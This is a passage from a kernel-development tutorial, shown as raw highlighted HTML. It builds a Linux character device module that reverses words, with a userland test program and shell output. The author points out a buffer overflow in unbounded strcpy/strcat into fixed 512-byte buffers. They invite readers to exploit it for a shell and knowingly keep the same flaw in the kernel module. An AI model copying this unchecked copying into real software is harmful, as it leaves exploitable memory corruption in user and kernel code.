class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="kt"char/spanspan class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="mi"513/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="s"quot;No dataquot;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"insert_word/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"n/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="mi"512/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"word/spanspan class="p")/spanspan class="mi"-1/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"gt;=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="o"--/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"word/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"n/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memset/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="k"sizeof/spanspan class="w" /spanspan class="n"data/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strcpy/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39; #39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strcat/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"reverse/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"tmpdata/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="mi"512/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p")/spanspan class="mi"-1/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"gt;=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="o"--/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p"[/spanspan class="n"i/spanspan class="p"]/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="sc"#39; #39;/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"insert_word/spanspan class="p"(/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="mi"1/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"-1/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"tmpdata/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"insert_word/spanspan class="p"(/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: %s lt;stringgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Before: %s/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"data/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"reverse/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;After: %s/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"data/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pSome of you should have noticed the a href="https://en.wikipedia.org/wiki/Buffer_overflow" target="_blank"buffer overflow/a in this application, if you haven't check out my a href="/categories/x86-32-linux.html"x86-32 linux/a section. You can write an exploit for this application and figure out how to get a shell. The character device will have a buffer overflow too, but we're not too worried about this as we are the only people that are going to be using it, if you wanted to secure this application you would just create another counter that always incremented and break when it reaches 512./p pAnyway, testing this application shows that it seems to work fine:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spangcc -o reverse-test-app reverse-test-app.c/span span class="code-line"span class="gp"root@dev:~/lkms# /span./reverse-test-app span class="s2"quot;this is a test applicationquot;/span/span span class="code-line"span class="go"Before: No data/span/span span class="code-line"span class="go"After: application test a is this/span/span span class="code-line"span class="gp"root@dev:~/lkms# /span./reverse-test-app span class="s2"quot;application test a is thisquot;/span/span span class="code-line"span class="go"Before: No data/span/span span class="code-line"span class="go"After: this is a test application/span/span span class="code-line"/code/pre/div /td/tr/table pObviously our "datastore" is only holding the data while the application is running so it isn't permanent but the "datastore" in the LKM will be. I guess its worth mentioning here that the "datastore" that we have in our LKM will be exactly the same as here, just a global character array, we could use any memory really but I'm using a character array for simplicity./p pThe functions (codereverse/code and codeinsert_word/code) in the test application can be put into the LKM as is./p pAlmost done, but a userland application can only write to and read from memory in userland; and LKM's should only write to and read from kernelland, so we need a way to copy from and copy to userland in kernelland. Luckily the kernel provides us with functions to be able to do that./p pIn the codeinclude/asm-generic/uaccess.h/code header file (which we'll also need to include) codecopy_from_user/code and codecopy_to_user/code are defined as follows:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"static/spanspan class="w" /spanspan class="kr"inline/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="nf"copy_from_user/spanspan class="p"(/spanspan class="kt"void/spanspan class="w" /spanspan class="o"*/spanspan class="n"to/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="n"__user/spanspan class="w" /spanspan class="o"*/spanspan class="w" /spanspan class="n"from/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"n/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"might_fault/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"access_ok/spanspan class="p"(/spanspan class="n"VERIFY_READ/spanspan class="p",/spanspan class="w" /spanspan class="n"from/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p"))/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"__copy_from_user/spanspan class="p"(/spanspan class="n"to/spanspan class="p",/spanspan class="w" /spanspan class="n"from/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"n/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kr"inline/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="nf"copy_to_user/spanspan class="p"(/spanspan class="kt"void/spanspan class="w" /spanspan class="n"__user/spanspan class="w" /spanspan class="o"*/spanspan class="n"to/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="o"*/spanspan class="n"from/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"n/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"might_fault/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"access_ok/spanspan class="p"(/spanspan class="n"VERIFY_WRITE/spanspan class="p",/spanspan class="w" /spanspan class="n"to/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p"))/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"__copy_to_user/spanspan class="p"(/spanspan class="n"to/spanspan class="p",/spanspan class="w" /spanspan class="n"from/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"n/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pBoth of these functions takes 2 void pointers (1 pointing to memory in userland and 1 pointing to memory in kernelland, they are of type void so that any type of data can be transferred), and a number (the amount of data to be copied)./p pWith all of this information we can finally build our character device:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/span span class="code-line"span class="normal"77/span/span span class="code-line"span class="normal"78/span/span span class="code-line"span class="normal"79/span/span span class="code-line"span class="normal"80/span/span span class="code-line"span class="normal"81/span/span span class="code-line"span class="normal"82/span/span span class="code-line"span class="normal"83/span/span span class="code-line"span class="normal"84/span/span span class="code-line"span class="normal"85/span/span span class="code-line"span class="normal"86/span/span span class="code-line"span class="normal"87/span/span span class="code-line"span class="normal"88/span/span span class="code-line"span class="normal"89/span/span span class="code-line"span class="normal"90/span/span span class="code-line"span class="normal"91/span/span span class="code-line"span class="normal"92/span/span span class="code-line"span class="normal"93/span/span span class="code-line"span class="normal"94/span/span span class="code-line"span class="normal"95/span/span span class="code-line"span class="normal"96/span/span span class="code-line"span class="normal"97/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/module.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/init.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/miscdevice.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/fs.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;asm/uaccess.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="n"MODULE_AUTHOR/spanspan class="p"(/spanspan class="s"quot;0xe7, 0x1equot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_DESCRIPTION/spanspan class="p"(/spanspan class="s"quot;A simple character device which reverses the words in a stringquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_LICENSE/spanspan class="p"(/spanspan class="s"quot;GPLquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="cp"#define DEVICE_SIZE 512/span/span span class="code-line"/span span class="code-line"span class="kt"char/spanspan class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"DEVICE_SIZE/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"]/spanspan class="o"=/spanspan class="s"quot;no data has been written yetquot;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"insert_word/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"n/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="n"DEVICE_SIZE/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"word/spanspan class="p")/spanspan class="mi"-1/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"gt;=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="o"--/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"word/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"n/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memset/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="k"sizeof/spanspan class="w" /spanspan class="n"data/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strcpy/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39; #39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strcat/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"reverse/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"tmpdata/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"DEVICE_SIZE/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p")/spanspan class="mi"-1/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"gt;=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="o"--/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p"[/spanspan class="n"i/spanspan class="p"]/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="sc"#39; #39;/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"insert_word/spanspan class="p"(/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="mi"1/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"-1/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan 